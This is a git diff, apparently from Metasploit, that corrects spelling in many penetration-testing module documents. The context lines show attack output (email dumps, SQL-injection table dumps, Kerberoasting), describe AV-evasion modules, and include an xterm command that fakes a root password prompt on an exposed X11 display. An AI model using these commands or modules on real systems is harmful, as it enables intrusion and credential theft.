cluster, nodes, -in the cluster, indicies, and pull data from those indicies. +in the cluster, indices, and pull data from those indices. ### Docker @@ -85,7 +85,7 @@ msf6 auxiliary(gather/elasticsearch/enum) > run ------------ ------ --------------- es-docker-cluster yellow 2 -[+] Indicies Information +[+] Indices Information ==================== Name Health Status UUID Documents Storage Usage (MB) diff --git a/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md b/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md index 08db4a86b21b..0abd403d3556 100644 --- a/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md +++ b/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md @@ -108,7 +108,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run [*] https://172.20.2.110:443 - Selecting the first internal server found [*] * targeting internal: server2 [*] https://172.20.2.110:443 - Attempt to dump emails for -[*] * successfuly connected to: inbox +[*] * successfully connected to: inbox [*] * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==) [*] * number of email found: 4 [*] https://172.20.2.110:443 - Processing dump of 4 items @@ -144,7 +144,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run [*] https://172.20.2.110:443 - Selecting the first internal server found [*] * targeting internal: server2 [*] https://172.20.2.110:443 - Attempt to dump contacts for -[*] * successfuly connected to: contacts +[*] * successfully connected to: contacts [*] * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==) [*] * number of contact found: 1 [*] https://172.20.2.110:443 - Processing dump of 1 items diff --git a/documentation/modules/auxiliary/gather/get_user_spns.md b/documentation/modules/auxiliary/gather/get_user_spns.md index 0f573b3d359d..d9a8000bbba7 100644 --- a/documentation/modules/auxiliary/gather/get_user_spns.md +++ b/documentation/modules/auxiliary/gather/get_user_spns.md @@ -1,6 +1,6 @@ ## Description -This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrive Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts. +This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts. ## Verification Steps diff --git a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md index e0bc7aed8184..54eee52dca0a 100644 --- a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md +++ b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md @@ -52,7 +52,7 @@ camera snapshots. ## Actions ### Automatic -Retrieves all information suported by this module +Retrieves all information supported by this module ### Configuration Retrieves the camera hardware and software configuration ### Credentials @@ -120,7 +120,7 @@ Device manufacturer: Hikvision.China Device model: DS-2CD2142FWD-IS Device S/N: DS-2CD2142FWD-IS2016HS77777777777 Device MAC: bc:ad:28:ff:ff:ff -Device firware version: V5.4.1 +Device firmware version: V5.4.1 Device firmware release: build 160525 Device boot version: V1.3.4 Device boot release: 100316 diff --git a/documentation/modules/auxiliary/gather/ldap_query.md b/documentation/modules/auxiliary/gather/ldap_query.md index a53dafcec317..2ad9ccad5e6e 100644 --- a/documentation/modules/auxiliary/gather/ldap_query.md +++ b/documentation/modules/auxiliary/gather/ldap_query.md @@ -7,7 +7,7 @@ of this JSON/YAML file on disk. Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES` -to a comma seperated string containing the list of attributes they are interested in obtaining +to a comma separated string containing the list of attributes they are interested in obtaining from the results. As a third option can run one of several predefined queries by setting `ACTION` to the diff --git a/documentation/modules/auxiliary/gather/office365userenum.md b/documentation/modules/auxiliary/gather/office365userenum.md index 19d332b6bd5c..93444ed141f7 100644 --- a/documentation/modules/auxiliary/gather/office365userenum.md +++ b/documentation/modules/auxiliary/gather/office365userenum.md @@ -14,7 +14,7 @@ Note this behaviour appears to be limited to Office365, MS Exchange does not app Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon. -This script is maintaing the ability to run independently of MSF. +This script is maintaining the ability to run independently of MSF. Office365's implementation of ActiveSync is vulnerable. diff --git a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md index 00643d44501f..deb810183f4c 100644 --- a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md +++ b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md @@ -289,7 +289,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [+] WAN [+] port_type [+] ethernet -[+] actiavted +[+] activated [+] name [+] WAN [+] enable @@ -355,7 +355,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run [+] WAN [+] port_type [+] ethernet -[+] actiavted +[+] activated [+] name [+] WAN [+] enable diff --git a/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md b/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md index 0e46f28c577a..adff01094238 100644 --- a/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md +++ b/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md @@ -19,7 +19,7 @@ Additionally, set the `USERNAME` option to specify the name of a privileged user To setup a test environment, the following steps can be performed. 1. Install docker [https://docker.io](docker.io) -2. Inside any directory create the dockerfile bellow: +2. Inside any directory create the dockerfile below: ```yaml FROM alpine:3.10.3 @@ -71,7 +71,7 @@ CMD ["php","-S","0.0.0.0:8000","-t","piwigo"] inside the folder that contains the `docker-compose.yml` and `Dockerfile` files. 5. Then Piwigo's installation page should be available at http://localhost:8000 6. Setup the database with `mysql` as url of database, **piwigo** as `username` **piwigo** as `password` -7. Login as priviledge user and create any photo album and upload any photo to that album. +7. Login as privilege user and create any photo album and upload any photo to that album. ## Verification Steps diff --git a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md index d13268110ea9..639d3a163caa 100644 --- a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md +++ b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md @@ -78,9 +78,9 @@ msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run [*] Running module against 192.168.1.100 [*] Brute forcing to find a valid node id. -[+] Sucessfully found node at id 1 +[+] Successfully found node at id 1 [*] Attempting to determine the vBulletin table prefix. -[+] Sucessfully retrieved table to get prefix from vb5_language. +[+] Successfully retrieved table to get prefix from vb5_language. [*] Getting table columns for vb5_user [+] Retrieved 78 columns for vb5_user [*] Dumping table vb5_user diff --git a/documentation/modules/auxiliary/gather/zoomeye_search.md b/documentation/modules/auxiliary/gather/zoomeye_search.md index bd790c6963a5..5c4eb8881f44 100644 --- a/documentation/modules/auxiliary/gather/zoomeye_search.md +++ b/documentation/modules/auxiliary/gather/zoomeye_search.md @@ -4,7 +4,7 @@ and output the information gathered into a table which can then be saved for lat ## Note You need to register for ZoomEye by creating an account with Telnet404. You can register for a temp email -at https://temp-mail.org and get a temp phone number to recieve the SMS's needed to sign up at https://smsreceivefree.com. +at https://temp-mail.org and get a temp phone number to receive the SMS's needed to sign up at https://smsreceivefree.com. Then browse to https://www.zoomeye.org, click on the `Register` button, and follow the steps from there. diff --git a/documentation/modules/auxiliary/scanner/db2/discovery.md b/documentation/modules/auxiliary/scanner/db2/discovery.md index 63e696dbfacf..3ac89e777382 100644 --- a/documentation/modules/auxiliary/scanner/db2/discovery.md +++ b/documentation/modules/auxiliary/scanner/db2/discovery.md @@ -9,7 +9,7 @@ Using the discovery method, catalog information for a remote server can be autom 1. `use auxiliary/scanner/db2/discovery` 2. `set RHOSTS [target address range/cidr]` -3. `set THREDS [number of threads]` +3. `set THREADS [number of threads]` 4. `run` ## Scenarios diff --git a/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md b/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md index 8f7865b1d33c..c4969425aa45 100644 --- a/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md +++ b/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md @@ -103,7 +103,7 @@ The following table contains the file types associated with the characters: **PATH** - It is possible to view content within a directory of the gophermap. If the intial run shows directory `Directory: foobar`, + It is possible to view content within a directory of the gophermap. If the initial run shows directory `Directory: foobar`, setting **path** to `/foobar` will enumerate the contents of that folder. Default: [empty string]. ## Scenarios diff --git a/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md b/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md index 76edea9a7031..a5ef4a306ddb 100644 --- a/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md +++ b/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md @@ -9,7 +9,7 @@ This module has been tested successfully on Cassandra Web versions: This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web 'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges. -This vulnerability occured due to the disabled Rack::Protection module. +This vulnerability occurred due to the disabled Rack::Protection module. This web service listens on TCP port 3000 by default on all network interface. diff --git a/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md b/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md index 36853d4c1480..a24242127c7c 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md @@ -72,7 +72,7 @@ The next part of the installation will require a Windows machine. From your Wind 1. Click "Install ASDM Launcher" 1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password) 1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned) -1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/ +1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/ 1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat` 1. Enter your ASAv's IP address (10.9.249.201) 1. Enter a blank username diff --git a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md index bfb260d78f13..a102171128a5 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md @@ -4,7 +4,7 @@ ## Vulnerable Application - Any Cisco networking device with the HTTP inteface turned on. + Any Cisco networking device with the HTTP interface turned on. ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/http/dir_scanner.md b/documentation/modules/auxiliary/scanner/http/dir_scanner.md index c4ee052293ce..014094e2217a 100644 --- a/documentation/modules/auxiliary/scanner/http/dir_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/dir_scanner.md @@ -2,7 +2,7 @@ This module scans one or more web servers for interesting directories that can be further explored. -## Verfication Steps +## Verification Steps 1. Do: ```use auxiliary/scanner/http/dir_scanner``` 2. Do: ```set RHOSTS [IP]``` diff --git a/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md b/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md index f06b9278fd4a..9411e1af1ce7 100644 --- a/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md +++ b/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md @@ -127,7 +127,7 @@ resource (es.rb)> set action LISTAPPSSYSTEM action => LISTAPPSSYSTEM resource (es.rb)> run [+] 1.1.1.1:59777 - Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203 + Package Access Helper (com.andriod.defcontainer) Version: 4.4.2-20150203 Launcher (com.android.launcher) Version: 4.4.2-20150203 Contacts (com.android.contacts) Version: 4.4.2-20150203 com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203 @@ -212,7 +212,7 @@ resource (es.rb)> run [+] 1.1.1.1:59777 TalkBack (com.google.android.marvin.talkback) Version: 5.0.7 Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431) - Phone (com.andriod.phone) Version: 1.0 + Phone (com.android.phone) Version: 1.0 Google Play Music (com.google.android.music) Version: 8.12.7210-1.F Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596 Cloud Print (com.google.android.apps.cloudprint) Version: 1.40 diff --git a/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md b/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md index 5b72b2c1edf8..021c55505192 100644 --- a/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md +++ b/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md @@ -1,5 +1,5 @@ ## Description -When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server. +When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrypted passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server. Affected Files: diff --git a/documentation/modules/auxiliary/scanner/http/http_put.md b/documentation/modules/auxiliary/scanner/http/http_put.md index 72d362e51aad..2c9e73bf7a59 100644 --- a/documentation/modules/auxiliary/scanner/http/http_put.md +++ b/documentation/modules/auxiliary/scanner/http/http_put.md @@ -7,7 +7,7 @@ This module can abuse misconfigured web servers to upload and delete web content 2. Do: ```set RHOSTS [IP]``` 3. Do: ```set RPORT [PORT]``` 4. Do: ```set PATH [PATH]``` -5. Do: ```set FILENAME [FILNAME]``` +5. Do: ```set FILENAME [FILENAME]``` 6. Do: ```set FILEDATA [PATH]``` 7. Do: ```run``` diff --git a/documentation/modules/auxiliary/scanner/http/jira_user_enum.md b/documentation/modules/auxiliary/scanner/http/jira_user_enum.md index efc0fda85d40..33f66ec62df3 100644 --- a/documentation/modules/auxiliary/scanner/http/jira_user_enum.md +++ b/documentation/modules/auxiliary/scanner/http/jira_user_enum.md @@ -1,6 +1,6 @@ ## Vulnerable Application - [Jira](https://www.atlassian.com/software/jira) Jira is team managment software for agile teams. + [Jira](https://www.atlassian.com/software/jira) Jira is team management software for agile teams. This module has been tested successfully on: diff --git a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md index 2592fb5ceb0c..03cca6bd63ae 100644 --- a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md +++ b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md @@ -1,4 +1,4 @@ -## Decription +## Description This module extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior. diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md index a868b9816521..dc361c0530da 100644 --- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md +++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md @@ -106,7 +106,7 @@ msf auxiliary(tomcat_mgr_login) > run ### Tomcat 8 -Tomcat 8.0.32 unning on Windows XP +Tomcat 8.0.32 running on Windows XP ``` msf > use auxiliary/scanner/http/tomcat_mgr_login diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md b/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md index 49e7c8b9013b..cba3dd0e71d1 100644 --- a/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md +++ b/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md @@ -1,6 +1,6 @@ ## Descriptions -This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More infomation can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335). +This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More information can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335). ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md index 1376502d568d..fc995103b525 100644 --- a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md +++ b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md @@ -13,14 +13,14 @@ the SMTP username and password. There is one potential false negative case where the `aggressive` option should be used. If debug mode was enabled, however only the `Test Email` was used (or no legit email has been sent by the server), the debug file won't exist yet. This will be remedied by the first password reset request, but to avoid this module -being too noisy, it won't happen unles `aggressive` is set to `true`. +being too noisy, it won't happen unless `aggressive` is set to `true`. To summarize: 1. Vulnerable version of Easy WP SMTP 1. debug turned on for Easy WP SMTP 1. SMTP configured for Easy WP SMTP -1. direcotry listings enabled +1. directory listings enabled ### Install diff --git a/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md b/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md index 70fb72cf27a2..4873d9567599 100644 --- a/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md +++ b/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md @@ -1,6 +1,6 @@ ## Vulnerable Application -RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existance. The idea behind rpcbind was to create a +RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existence. The idea behind rpcbind was to create a 'directory' that could be asked where a service is running (port). Having this single port/service be queryable meant, the services being managed by rpcbind could actually be running on any port or protocol, and rpdbind would be in charge of letting clients know where they were. This is more or less an outdated model/service, and NFS is arguably the most popular service still utilizing rpcbind. The following was done on Kali linux: diff --git a/documentation/modules/auxiliary/scanner/mqtt/connect.md b/documentation/modules/auxiliary/scanner/mqtt/connect.md index dd2684bef203..35a6ff98e165 100644 --- a/documentation/modules/auxiliary/scanner/mqtt/connect.md +++ b/documentation/modules/auxiliary/scanner/mqtt/connect.md @@ -22,7 +22,7 @@ $ docker run -i -p 1883:1883 toke/mosquitto 1513822879: Opening ipv6 listen socket on port 1883. ``` -#### Docker MQTT Server Without Anonymous Authenticaiton +#### Docker MQTT Server Without Anonymous Authentication Msquitto can be configured to require credentials. To run in this way: diff --git a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md index a827edb84bdb..899cfb400067 100644 --- a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md +++ b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md @@ -5,7 +5,7 @@ This applies to all versions of SAP software. The SAP Management Console (SAP MC) provides a common framework for centralized system management. It allows you to monitor and perform basic administration tasks on the SAP system centrally, which simplifies system administration. (https://help.sap.com/doc/saphelp_nwpi711/7.1.1/en-US/fa/ec218eb89b4424a9a0b423b0643952/frameset.htm) -SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reacheable by default. +SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reachable by default. With this module you can list the config files that SAP loads when starts the SAP server. This unauthenticated information disclosure can be used in a more advanced attack to get knowledge about in which paths SAP stores the config files to, for example, retrieve sensitive data or trojanize the startup process. diff --git a/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md b/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md index afd204a46ffe..c90679f101c6 100644 --- a/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md +++ b/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md @@ -1,5 +1,5 @@ Siemens Industrial controllers and most other industrial OEMs -use a proprietary protocol to discover their devices accross a network. +use a proprietary protocol to discover their devices across a network. In the case of Siemens this is called the Profinet Discover Protocol. Known in Wireshark as PN_DCP diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md index 70376406e547..2204fe0a2cdc 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md @@ -4,7 +4,7 @@ This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup) feature of IOS and many other networking devices, and is part of an administrator functionality. A read-write community string is required, as well as a tftp server (metasploit includes one). - After the config has been copied, the SNMP paramters are deleted. + After the config has been copied, the SNMP parameters are deleted. ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md index 23e75c513b24..b1d85f92c0dd 100644 --- a/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md +++ b/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md @@ -4,7 +4,7 @@ A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware) - For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts) + For verification purposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts) ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md index 2f64b4da9b14..280db80f7a8d 100644 --- a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md +++ b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md @@ -77,7 +77,7 @@ $ curl https://localhost:8443 -k **TLS_VERSION** - The specific version of TLS (or SSL) to use, if only specific ones are avaialble. Defaults to `1.0` (TLS1.0). + The specific version of TLS (or SSL) to use, if only specific ones are available. Defaults to `1.0` (TLS1.0). **MAX_KEYTRIES** @@ -90,7 +90,7 @@ $ curl https://localhost:8443 -k **DUMPFILTER** - A regular expresion (used in scan function) to use to filter the dump before storing. Default is `nil`. + A regular expression (used in scan function) to use to filter the dump before storing. Default is `nil`. **RESPONSE_TIMEOUT** diff --git a/documentation/modules/auxiliary/scanner/ssl/ssl_version.md b/documentation/modules/auxiliary/scanner/ssl/ssl_version.md index 3523d5f48e2a..0321e2c5fce9 100644 --- a/documentation/modules/auxiliary/scanner/ssl/ssl_version.md +++ b/documentation/modules/auxiliary/scanner/ssl/ssl_version.md @@ -17,7 +17,7 @@ versions installed on the system. List is dynamically generated. Defaults to `al ### SSLCipher -Which SSL/TLS Cipher to use. `all` implies all ciphers avaiable for the version of SSL/TLS being used and which +Which SSL/TLS Cipher to use. `all` implies all ciphers available for the version of SSL/TLS being used and which are usable by the metasploit + ruby + OpenSSL versions installed on the system. List is dynamically generated. Defaults to `all` diff --git a/documentation/modules/auxiliary/scanner/x11/open_x11.md b/documentation/modules/auxiliary/scanner/x11/open_x11.md index 2adb1ed9dfcc..03883e86e767 100644 --- a/documentation/modules/auxiliary/scanner/x11/open_x11.md +++ b/documentation/modules/auxiliary/scanner/x11/open_x11.md @@ -173,7 +173,7 @@ This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10. 1. start `xspy` 2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"` - - Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username + - Notice it asks twice for the password in case of a mistyped initial password. This can also be adjusted to just say password or the real user's username - The victim's typed text by the user will not be masked (`*`) ### Direct Exploitation diff --git a/documentation/modules/auxiliary/server/local_hwbridge.md b/documentation/modules/auxiliary/server/local_hwbridge.md index fbbf357533f1..fba97691c859 100644 --- a/documentation/modules/auxiliary/server/local_hwbridge.md +++ b/documentation/modules/auxiliary/server/local_hwbridge.md @@ -12,11 +12,11 @@ To experimient with using Metasploit to send automtovie CAN bus packets you can the SocketCAN capabilities of Linux to create a virtual CAN device. NOTE: If you have a supported CAN sniffer you could also use a real can device. -In order for the local_hwbridge to inteface with SocketCAN you will need: +In order for the local_hwbridge to interface with SocketCAN you will need: * can-utils -Once those are installed you can setup a virtual CAN inteface using: +Once those are installed you can setup a virtual CAN interface using: ``` sudo modprobe can diff --git a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md index 531ff25c4d2e..c8056be03f41 100644 --- a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md +++ b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md @@ -3,7 +3,7 @@ This module exploits a vulnerability in Dlink Central WifiManager (CWM-100), found in versions lower than v1.03R0100_BETA6, allowing unauthenticated users to -execute arbitary SQL queries. +execute arbitrary SQL queries. This module has 3 actions: @@ -175,6 +175,6 @@ msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run ### Going further -It is possible to upload arbitary files to the target system using queries of the form +It is possible to upload arbitrary files to the target system using queries of the form (copy ... to ...), but using full paths, the attacker must know the path of the webroot to upload a webshell this way. diff --git a/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md b/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md index 221cf9f2eda8..2f92158a1c70 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md +++ b/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md @@ -12,7 +12,7 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 ## Options - **TXT_FILE** - Filename for the evasive file (default: regasm_regsvcs.txt). -- **SNK_FILE** - Filename for the .snk file (default: key.snk). (note: to aid furter evasion it is recommended to create your own .snk file ref: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/how-to-sign-an-assembly-with-a-strong-name) +- **SNK_FILE** - Filename for the .snk file (default: key.snk). (note: to aid further evasion it is recommended to create your own .snk file ref: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/how-to-sign-an-assembly-with-a-strong-name) ## Verification Steps diff --git a/documentation/modules/evasion/windows/process_herpaderping.md b/documentation/modules/evasion/windows/process_herpaderping.md index d42d943f2049..2ecd52d2946b 100644 --- a/documentation/modules/evasion/windows/process_herpaderping.md +++ b/documentation/modules/evasion/windows/process_herpaderping.md @@ -64,7 +64,7 @@ removed automatically when the session is terminated or if an error occurs. ### REPLACED_WITH_FILE The file to replace the target with. If not set, the target file will be filled -with random bytes (WARNING! it is likely to be catched by AV). Windows +with random bytes (WARNING! it is likely to be caught by AV). Windows environment variables can be used in the path and the default is set to `%SystemRoot%\\System32\\calc.exe`. @@ -125,7 +125,7 @@ Module options (evasion/windows/process_herpaderping): ---- --------------- -------- ----------- ENCODER no A specific encoder to use (automatically selected if not set) FILENAME raU.exe yes Filename for the evasive file (default: random) - REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will be filled with random bytes (WARNING! it is likely to be catched by AV). + REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will be filled with random bytes (WARNING! it is likely to be caught by AV). WRITEABLE_DIR %TEMP% yes Where to write the loader on disk diff --git a/documentation/modules/evasion/windows/syscall_inject.md b/documentation/modules/evasion/windows/syscall_inject.md index 035480eb26e8..20de123f8d85 100644 --- a/documentation/modules/evasion/windows/syscall_inject.md +++ b/documentation/modules/evasion/windows/syscall_inject.md @@ -1,6 +1,6 @@ ## Description This module lets you create a Windows executable that injects a specific payload/shellcode in memory bypassing EDR/AVs Windows API hooking technique via direct syscalls achieved by Mingw's inline assembly. -Mingw needs (x86_64) to be installed on the system and in the PATH enviroment variable. +Mingw needs (x86_64) to be installed on the system and in the PATH environment variable. The technique used is based on Sorting by System Call Address, by enumerating all Zw* stubs in the EAT of NTDLL.dll and then sorting them by address, it still works even if syscall indices were overwritten by AVs. [For more details](https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/) diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md index 5f1344cd8089..cead3a34a928 100644 --- a/documentation/modules/exploit/aix/local/xorg_x11_server.md +++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md @@ -1,6 +1,6 @@ ## Description -This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested 